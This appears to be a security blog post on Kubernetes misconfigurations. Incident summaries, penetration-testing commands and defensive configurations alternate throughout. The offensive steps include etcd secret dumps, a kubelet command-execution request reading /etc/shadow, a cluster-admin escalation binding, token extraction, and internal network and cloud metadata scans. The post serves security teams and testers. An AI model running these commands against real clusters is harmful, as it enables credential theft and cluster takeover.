Kubernetes has become the de facto standard for container orchestration, powering everything from startups to Fortune 500 infrastructure. But with great power comes great complexity—and that complexity breeds misconfiguration. The NSA and CISA have explicitly warned that "Kubernetes is commonly targeted for three reasons: data theft, computational power theft, or denial of service."
This post examines the misconfigurations that have enabled real-world breaches, providing both offensive techniques for penetration testers and defensive guidance for security teams.
The Kubernetes Attack Surface
Before diving into specific misconfigurations, it's important to understand what attackers target in Kubernetes environments:
- Control Plane Components: API Server, etcd, Controller Manager, Scheduler
- Node Components: Kubelet, Container Runtime, kube-proxy
- Workloads: Pods, Deployments, Services, Secrets
- Network: Inter-pod communication, Ingress, Service Mesh
- Supply Chain: Container images, Helm charts, Operators
Compromise at any layer can cascade. A misconfigured RBAC policy might allow a compromised pod to read Secrets across namespaces; an exposed API server might grant unauthenticated cluster-admin access.
Exposed Kubernetes Dashboard
Tesla Cryptojacking Incident (2018)
Attackers discovered Tesla's Kubernetes dashboard was exposed to the internet without authentication. They deployed cryptocurrency miners and accessed AWS credentials stored in environment variables, gaining broader cloud access.
The Kubernetes Dashboard provides a web UI for cluster management. When exposed without authentication—a surprisingly common configuration—it grants attackers visual access to the entire cluster.
Finding Exposed Dashboards
# Shodan search for Kubernetes dashboards
shodan search "kubernetes-dashboard" "port:443"
# Common dashboard paths
https://target:443/api/v1/namespaces/kubernetes-dashboard/services/https:kubernetes-dashboard:/proxy/
https://target:8443/
# Default ports
# 8443 - Dashboard HTTPS
# 30000-32767 - NodePort range (dashboard often exposed here)
Exploitation
An unauthenticated dashboard allows:
- Viewing all namespaces, pods, secrets, and configurations
- Creating new workloads (including privileged pods)
- Executing commands in running containers
- Downloading secrets and configmaps
Defense
- Never expose the dashboard publicly
- Require authentication (OIDC, token-based)
- Use `kubectl proxy` for local access instead
- Apply network policies restricting dashboard access
- Consider removing the dashboard entirely in production
Anonymous Authentication to API Server
Multiple Cryptojacking Campaigns (2018-Present)
Researchers have repeatedly discovered thousands of Kubernetes clusters with anonymous authentication enabled, allowing anyone to query the API server. Attackers use automated scanners to find these clusters and deploy miners within minutes of discovery.
By default, the Kubernetes API server accepts anonymous requests, assigning them the system:anonymous user and the system:unauthenticated group. If RBAC isn't locked down, this anonymous identity may hold dangerous permissions.
Testing for Anonymous Access
# Check if anonymous auth is allowed
curl -k https://target:6443/api/v1/namespaces
# Check specific resources
curl -k https://target:6443/api/v1/secrets
curl -k https://target:6443/api/v1/pods
# Check permissions
curl -k https://target:6443/apis/authorization.k8s.io/v1/selfsubjectaccessreviews \
-X POST -H "Content-Type: application/json" \
-d '{"apiVersion":"authorization.k8s.io/v1","kind":"SelfSubjectAccessReview","spec":{"resourceAttributes":{"verb":"list","resource":"secrets"}}}'
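The same permission check is easy to script. Below is a minimal sketch in Python that builds the SelfSubjectAccessReview body from the curl example and interprets the server's verdict from `.status.allowed`; the sample response here is fabricated to mirror a typical denial, and in practice you would POST the body to the target API server.

```python
import json

# Build the SelfSubjectAccessReview body shown in the curl example above.
def build_review(verb: str, resource: str) -> dict:
    return {
        "apiVersion": "authorization.k8s.io/v1",
        "kind": "SelfSubjectAccessReview",
        "spec": {"resourceAttributes": {"verb": verb, "resource": resource}},
    }

# The API server's answer lives in .status.allowed.
def is_allowed(response: dict) -> bool:
    return bool(response.get("status", {}).get("allowed", False))

body = json.dumps(build_review("list", "secrets"))

# Sample response shaped like a real API server denial (illustrative only).
sample = {"kind": "SelfSubjectAccessReview",
          "status": {"allowed": False, "reason": "RBAC denied"}}
print(is_allowed(sample))
```

Iterating `build_review` over verbs and resources gives a quick permission map for whatever identity the request is made as.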
Common Dangerous Configurations
# DANGEROUS: Grants anonymous users cluster-admin
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: anonymous-admin
subjects:
- kind: User
  name: system:anonymous
  apiGroup: rbac.authorization.k8s.io
roleRef:
  kind: ClusterRole
  name: cluster-admin
  apiGroup: rbac.authorization.k8s.io
Defense
# Disable anonymous auth in API server flags
--anonymous-auth=false
# Or ensure anonymous user has no permissions (default in modern K8s)
# Review RBAC bindings for system:anonymous and system:unauthenticated
Exposed etcd
Shopify Bug Bounty (2019)
A researcher discovered Shopify's internal Kubernetes cluster had etcd accessible from certain network positions. Etcd contained all cluster secrets, including database credentials and API keys. The issue was reported through their bug bounty program.
Etcd is Kubernetes' brain—it stores all cluster state, including Secrets (often base64 encoded but not encrypted). Direct etcd access bypasses all Kubernetes authentication and authorization.
Finding Exposed etcd
# Default etcd ports
# 2379 - Client communication
# 2380 - Peer communication
# Shodan search
shodan search "etcd" "port:2379"
# Test connectivity
curl http://target:2379/v2/keys
etcdctl --endpoints=http://target:2379 get / --prefix --keys-only
Extracting Secrets
# List all keys
etcdctl --endpoints=http://target:2379 get / --prefix --keys-only
# Get Kubernetes secrets
etcdctl --endpoints=http://target:2379 get /registry/secrets --prefix
# Secrets are stored at paths like:
# /registry/secrets/default/my-secret
# /registry/secrets/kube-system/admin-token
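Given a key dump, pulling out the secret inventory is a one-liner per key: Kubernetes stores Secrets at `/registry/secrets/<namespace>/<name>`. A hypothetical parser for `etcdctl ... --keys-only` output (sample keys below are illustrative):

```python
# Extract (namespace, name) pairs from etcd registry keys.
def parse_secret_keys(keys_output: str):
    results = []
    for line in keys_output.splitlines():
        parts = line.strip().split("/")
        # A secret key splits into ['', 'registry', 'secrets', '<ns>', '<name>']
        if len(parts) == 5 and parts[1] == "registry" and parts[2] == "secrets":
            results.append((parts[3], parts[4]))
    return results

sample = """/registry/secrets/default/my-secret
/registry/secrets/kube-system/admin-token
/registry/pods/default/web-0"""
print(parse_secret_keys(sample))
```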
Defense
- Require TLS client certificates for etcd access
- Never expose etcd outside the control plane network
- Enable etcd encryption at rest for secrets
- Use network policies/firewalls to restrict etcd access to API server only
# Enable encryption at rest
apiVersion: apiserver.config.k8s.io/v1
kind: EncryptionConfiguration
resources:
  - resources:
      - secrets
    providers:
      - aescbc:
          keys:
            - name: key1
              secret: <base64-encoded-key>
      - identity: {}
Overpermissioned RBAC
Microsoft Azure Security Research (2021)
Researchers demonstrated how a single pod with permission to create RoleBindings could escalate to cluster-admin by binding itself to the cluster-admin ClusterRole. This pattern appears frequently in real environments.
RBAC misconfigurations are endemic in Kubernetes. The complexity of roles, cluster roles, bindings, and service accounts leads to overpermissioned configurations that enable privilege escalation.
Dangerous RBAC Patterns
Wildcard Permissions
# DANGEROUS: Grants all permissions
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: too-permissive
rules:
- apiGroups: ["*"]
  resources: ["*"]
  verbs: ["*"]
Escalation via bind/escalate
# If a role can bind roles, it can grant itself any permission
rules:
- apiGroups: ["rbac.authorization.k8s.io"]
  resources: ["rolebindings", "clusterrolebindings"]
  verbs: ["create", "bind"]
# Or escalate existing roles
- apiGroups: ["rbac.authorization.k8s.io"]
  resources: ["roles", "clusterroles"]
  verbs: ["escalate"]
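To make the escalation concrete, here is a hedged sketch of the manifest an attacker with create/bind permissions would submit: a ClusterRoleBinding tying their own service account to cluster-admin. The names (`default`/`attacker-sa`, the binding name) are illustrative, not from any real incident.

```python
import json

# Build the ClusterRoleBinding an attacker with create+bind on
# clusterrolebindings would POST to grant themselves cluster-admin.
def escalation_binding(namespace: str, sa_name: str) -> dict:
    return {
        "apiVersion": "rbac.authorization.k8s.io/v1",
        "kind": "ClusterRoleBinding",
        "metadata": {"name": "innocuous-looking-binding"},  # hypothetical name
        "subjects": [{
            "kind": "ServiceAccount",
            "name": sa_name,
            "namespace": namespace,
        }],
        "roleRef": {
            "apiGroup": "rbac.authorization.k8s.io",
            "kind": "ClusterRole",
            "name": "cluster-admin",
        },
    }

manifest = escalation_binding("default", "attacker-sa")
print(json.dumps(manifest, indent=2))
```

One `kubectl create -f` (or API POST) with this body and every token for that service account is cluster-admin.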
Pod Creation with Service Account Control
# Creating pods + controlling service accounts = privilege escalation
# Attacker creates pod with highly privileged service account
rules:
- apiGroups: [""]
  resources: ["pods"]
  verbs: ["create"]
- apiGroups: [""]
  resources: ["serviceaccounts"]
  verbs: ["get", "list"]
Auditing RBAC
# List all cluster role bindings
kubectl get clusterrolebindings -o wide
# Find overpermissioned roles
kubectl get clusterroles -o json | jq '.items[] | select(.rules[]?.verbs[]? == "*") | .metadata.name'
# Check what a service account can do
kubectl auth can-i --list --as=system:serviceaccount:default:my-sa
# Tools for RBAC analysis
# - rbac-lookup
# - kubectl-who-can
# - rakkess
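The jq filter above can be approximated in a few lines of Python, which makes it easier to extend to wildcard resources and apiGroups as well. A minimal sketch over `kubectl get clusterroles -o json` output (the sample roles below are fabricated):

```python
import json

# Flag cluster roles whose rules use "*" in verbs, resources, or apiGroups.
def wildcard_roles(clusterroles_json: str):
    flagged = []
    for role in json.loads(clusterroles_json).get("items", []):
        for rule in role.get("rules") or []:  # rules may be null
            fields = (rule.get("verbs", []) + rule.get("resources", [])
                      + rule.get("apiGroups", []))
            if "*" in fields:
                flagged.append(role["metadata"]["name"])
                break
    return flagged

sample = json.dumps({"items": [
    {"metadata": {"name": "too-permissive"},
     "rules": [{"apiGroups": ["*"], "resources": ["*"], "verbs": ["*"]}]},
    {"metadata": {"name": "view-pods"},
     "rules": [{"apiGroups": [""], "resources": ["pods"],
                "verbs": ["get", "list"]}]},
]})
print(wildcard_roles(sample))
```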
Defense
- Follow least privilege—grant only necessary permissions
- Avoid wildcards in RBAC rules
- Be cautious with bind, escalate, impersonate verbs
- Regularly audit RBAC with automated tools
- Use namespace isolation to limit blast radius
Exposed Kubelet API
Hildegard Malware Campaign (2021)
The Hildegard malware specifically targeted exposed Kubelet APIs to deploy cryptominers. It scanned for kubelets listening on port 10250 without authentication and used them to execute commands in containers across the cluster.
Every Kubernetes node runs a Kubelet that manages pods on that node. The Kubelet API (port 10250) allows pod management and command execution. When exposed without authentication, it's a direct path to container compromise.
Finding Exposed Kubelets
# Default Kubelet ports
# 10250 - HTTPS API
# 10255 - Read-only HTTP (deprecated but sometimes enabled)
# Check for anonymous access
curl -k https://target:10250/pods
# List running pods
curl -k https://target:10250/runningpods/
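The `/pods` endpoint returns a pod list whose namespace/pod/container triples are exactly what the `/run/<namespace>/<pod>/<container>` endpoint expects, so enumeration feeds directly into command execution. A hedged sketch of that mapping, run here against a fabricated sample response:

```python
import json

# Turn a kubelet /pods response into /run/... paths for command execution.
def run_targets(podlist_json: str):
    targets = []
    for pod in json.loads(podlist_json).get("items", []):
        ns = pod["metadata"]["namespace"]
        name = pod["metadata"]["name"]
        for c in pod["spec"].get("containers", []):
            targets.append(f"/run/{ns}/{name}/{c['name']}")
    return targets

sample = json.dumps({"items": [{
    "metadata": {"namespace": "kube-system", "name": "coredns-abc"},
    "spec": {"containers": [{"name": "coredns"}]},
}]})
print(run_targets(sample))
```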
Exploitation
# Execute commands in a container
curl -k https://target:10250/run/<namespace>/<pod>/<container> \
-X POST -d "cmd=id"
# Example: Run in kube-system namespace
curl -k https://target:10250/run/kube-system/coredns-5644d7b6d9-xxxxx/coredns \
-X POST -d "cmd=cat /etc/shadow"
# Get container logs
curl -k https://target:10250/containerLogs/<namespace>/<pod>/<container>
Defense
# Kubelet configuration (kubelet-config.yaml)
authentication:
  anonymous:
    enabled: false
  webhook:
    enabled: true
authorization:
  mode: Webhook
# Command line flags
--anonymous-auth=false
--authorization-mode=Webhook
Secrets Mismanagement
Kubernetes Secrets are base64 encoded by default—not encrypted. This leads to multiple exposure vectors:
Secrets in Environment Variables
# Common but problematic pattern
env:
- name: DB_PASSWORD
  valueFrom:
    secretKeyRef:
      name: db-creds
      key: password
# Environment variables are visible in:
# - /proc/<pid>/environ
# - Container runtime inspection
# - Log aggregation (if env vars are logged)
# - Child processes
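The child-process leak in particular needs no Kubernetes access at all to demonstrate: any subprocess inherits secret-bearing environment variables unless they are explicitly stripped. A quick sketch (the DB_PASSWORD value is a stand-in for an injected secret):

```python
import os
import subprocess
import sys

# Simulate a secret injected via secretKeyRef into the environment.
os.environ["DB_PASSWORD"] = "hunter2"

# Any child process inherits it automatically.
leaked = subprocess.run(
    [sys.executable, "-c", "import os; print(os.environ['DB_PASSWORD'])"],
    capture_output=True, text=True,
).stdout.strip()
print(leaked)
```

The same value is also readable from `/proc/<pid>/environ` by anything that can inspect the process.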
Secrets Mounted as Files
Mounting secrets as files is safer but still requires proper permissions:
volumeMounts:
- name: secret-volume
  mountPath: /etc/secrets
  readOnly: true
volumes:
- name: secret-volume
  secret:
    secretName: my-secret
    defaultMode: 0400  # Restrict file permissions
Extracting Secrets
# If you have list secrets permission
kubectl get secrets -A -o json | jq '.items[].data'
# Decode base64
kubectl get secret my-secret -o jsonpath='{.data.password}' | base64 -d
# From within a compromised pod
cat /var/run/secrets/kubernetes.io/serviceaccount/token
ls /etc/secrets/
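What the `jq '.data'` plus `base64 -d` pipeline does can be sketched in Python: Secret `.data` values are base64-encoded, nothing more. The sample Secret below is fabricated to show the round-trip.

```python
import base64
import json

# Decode every value in a Secret's .data map, as kubectl -o json returns it.
def decode_secret_data(secret_json: str) -> dict:
    data = json.loads(secret_json).get("data", {})
    return {k: base64.b64decode(v).decode() for k, v in data.items()}

sample = json.dumps({
    "kind": "Secret",
    "metadata": {"name": "db-creds"},
    "data": {"password": base64.b64encode(b"s3cr3t").decode()},
})
print(decode_secret_data(sample))
```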
Defense
- Enable encryption at rest for Secrets
- Use external secrets management (HashiCorp Vault, AWS Secrets Manager)
- Mount secrets as files, not environment variables
- Restrict secret access via RBAC
- Rotate secrets regularly
- Consider secrets-store-csi-driver for external secret providers
Missing Network Policies
Various Cryptojacking Campaigns (Ongoing)
Once attackers compromise a single pod, the absence of network policies allows them to scan the internal network, access other services, reach the metadata service (cloud environments), and communicate with C2 infrastructure without restriction.
By default, Kubernetes allows all pod-to-pod communication. Without network policies, a compromised pod can reach any other pod in the cluster.
Demonstrating the Risk
# From a compromised pod, scan the cluster network
# Install nmap (if possible)
apt update && apt install -y nmap
# Scan for other services
nmap -sT 10.0.0.0/8 -p 80,443,3306,5432,6379,27017
# Access cloud metadata
curl http://169.254.169.254/latest/meta-data/
# Reach Kubernetes API
curl -k https://kubernetes.default.svc/api/v1/namespaces
Implementing Network Policies
# Default deny all ingress
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-ingress
  namespace: production
spec:
  podSelector: {}
  policyTypes:
  - Ingress
---
# Allow specific traffic
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-frontend-to-backend
  namespace: production
spec:
  podSelector:
    matchLabels:
      app: backend
  policyTypes:
  - Ingress
  ingress:
  - from:
    - podSelector:
        matchLabels:
          app: frontend
    ports:
    - protocol: TCP
      port: 8080
Defense
- Implement default-deny network policies in all namespaces
- Explicitly allow only required traffic
- Block metadata service access (169.254.169.254) from pods
- Use a CNI that supports network policies (Calico, Cilium, Weave)
- Consider service mesh for mTLS between services
Privileged Containers and Host Access
We covered container escapes in detail in our previous post, but it's worth emphasizing how often we find these in Kubernetes environments:
Common Dangerous Configurations
# Privileged container
securityContext:
  privileged: true
# Host namespaces
hostNetwork: true
hostPID: true
hostIPC: true
# Dangerous volume mounts
volumes:
- name: docker-sock
  hostPath:
    path: /var/run/docker.sock
- name: host-root
  hostPath:
    path: /
Defense: Pod Security Standards
Kubernetes provides Pod Security Standards (replacing PodSecurityPolicy) to enforce security constraints:
# Enforce restricted policy on namespace
kubectl label namespace production \
pod-security.kubernetes.io/enforce=restricted \
pod-security.kubernetes.io/warn=restricted \
pod-security.kubernetes.io/audit=restricted
The "restricted" policy prevents:
- Privileged containers
- Host namespace sharing
- Dangerous volume types
- Root user containers
- Privilege escalation
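A rough approximation of a few of those checks, useful as a pre-admission lint in CI. This is a sketch, not the real restricted profile, which covers more fields (seccomp profiles, capabilities, volume types):

```python
# Flag pod-spec settings the "restricted" profile would reject.
def restricted_violations(pod_spec: dict):
    violations = []
    for key in ("hostNetwork", "hostPID", "hostIPC"):
        if pod_spec.get(key):
            violations.append(key)
    for c in pod_spec.get("containers", []):
        sc = c.get("securityContext", {})
        if sc.get("privileged"):
            violations.append(f"{c['name']}: privileged")
        # restricted requires allowPrivilegeEscalation: false, explicitly
        if sc.get("allowPrivilegeEscalation", True):
            violations.append(f"{c['name']}: allowPrivilegeEscalation")
        if not sc.get("runAsNonRoot"):
            violations.append(f"{c['name']}: runAsNonRoot unset")
    return violations

bad = {"hostPID": True,
       "containers": [{"name": "app",
                       "securityContext": {"privileged": True}}]}
print(restricted_violations(bad))
```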
Supply Chain Attacks
Codecov Supply Chain Attack (2021)
While not Kubernetes-specific, the Codecov attack demonstrated how compromised container images and CI/CD tools can propagate through Kubernetes deployments. Attackers modified a bash script that was pulled during container builds, extracting environment variables (including Kubernetes credentials) from CI/CD pipelines.
Image Security Risks
- Pulling images from untrusted registries
- Using `latest` tags instead of pinned versions
- Not scanning images for vulnerabilities
- Not verifying image signatures
Defense
# Restrict image sources with admission controllers
apiVersion: admissionregistration.k8s.io/v1
kind: ValidatingWebhookConfiguration
# ... configure to only allow images from trusted registries
# Use image digest instead of tags
image: myregistry.com/myapp@sha256:abc123...
# Enable image signature verification with Sigstore/cosign
# Configure in admission controller policy
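The digest-pinning rule is simple enough to express as an admission-style check. A hypothetical sketch that accepts only digest-pinned references from an allow-listed registry (`myregistry.com` is illustrative, matching the example above):

```python
import re

# Accept only images from the trusted registry, pinned by sha256 digest.
# The registry name is a placeholder; a real policy would be configurable.
DIGEST_RE = re.compile(r"^myregistry\.com/[\w./-]+@sha256:[0-9a-f]{64}$")

def image_allowed(image: str) -> bool:
    return bool(DIGEST_RE.match(image))

print(image_allowed("myregistry.com/myapp@sha256:" + "a" * 64))  # digest-pinned
print(image_allowed("myregistry.com/myapp:latest"))              # mutable tag
print(image_allowed("docker.io/evil/miner@sha256:" + "a" * 64))  # wrong registry
```

In production this logic would live in an admission webhook or a policy engine rather than application code.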
Kubernetes Security Checklist
Based on the misconfigurations we've covered, here's a condensed security checklist:
API Server
- Disable anonymous authentication or ensure no RBAC permissions for anonymous
- Enable audit logging
- Use TLS for all API communication
- Restrict API server network access
etcd
- Require TLS client certificates
- Enable encryption at rest
- Restrict network access to control plane only
Kubelet
- Disable anonymous authentication
- Enable webhook authorization
- Restrict network access
RBAC
- Follow least privilege
- No wildcards in production roles
- Audit regularly
- Restrict bind/escalate/impersonate verbs
Workloads
- Enforce Pod Security Standards
- No privileged containers
- No host namespace sharing
- Read-only root filesystem
- Run as non-root
Network
- Implement default-deny network policies
- Block metadata service access
- Use TLS for service communication
Secrets
- Enable encryption at rest
- Use external secrets management
- Mount as files, not environment variables
- Restrict access via RBAC
Conclusion
Kubernetes security failures rarely stem from sophisticated attacks. They result from misconfigurations that provide excessive access—exposed dashboards, anonymous authentication, overpermissioned RBAC, and missing network policies. These issues persist because Kubernetes prioritizes functionality over security by default, and because its complexity makes secure configuration challenging.
The breaches we've examined share common patterns: attackers find exposed management interfaces, leverage overpermissioned service accounts, or exploit the absence of network segmentation. Each of these is preventable with proper configuration.
For organizations running Kubernetes, security must be proactive. Regular audits, automated policy enforcement, and defense-in-depth are essential. For penetration testers, understanding these misconfigurations provides reliable paths through even well-defended environments—because somewhere, someone forgot to disable anonymous authentication.
Tools and Resources
- Kubernetes Documentation - Official docs and security guides
- Trivy - Vulnerability scanner for containers and K8s
- kube-bench - CIS Kubernetes Benchmark checks
- Falco - Runtime security monitoring
- KubiScan - RBAC security scanning
- kube-hunter - Kubernetes penetration testing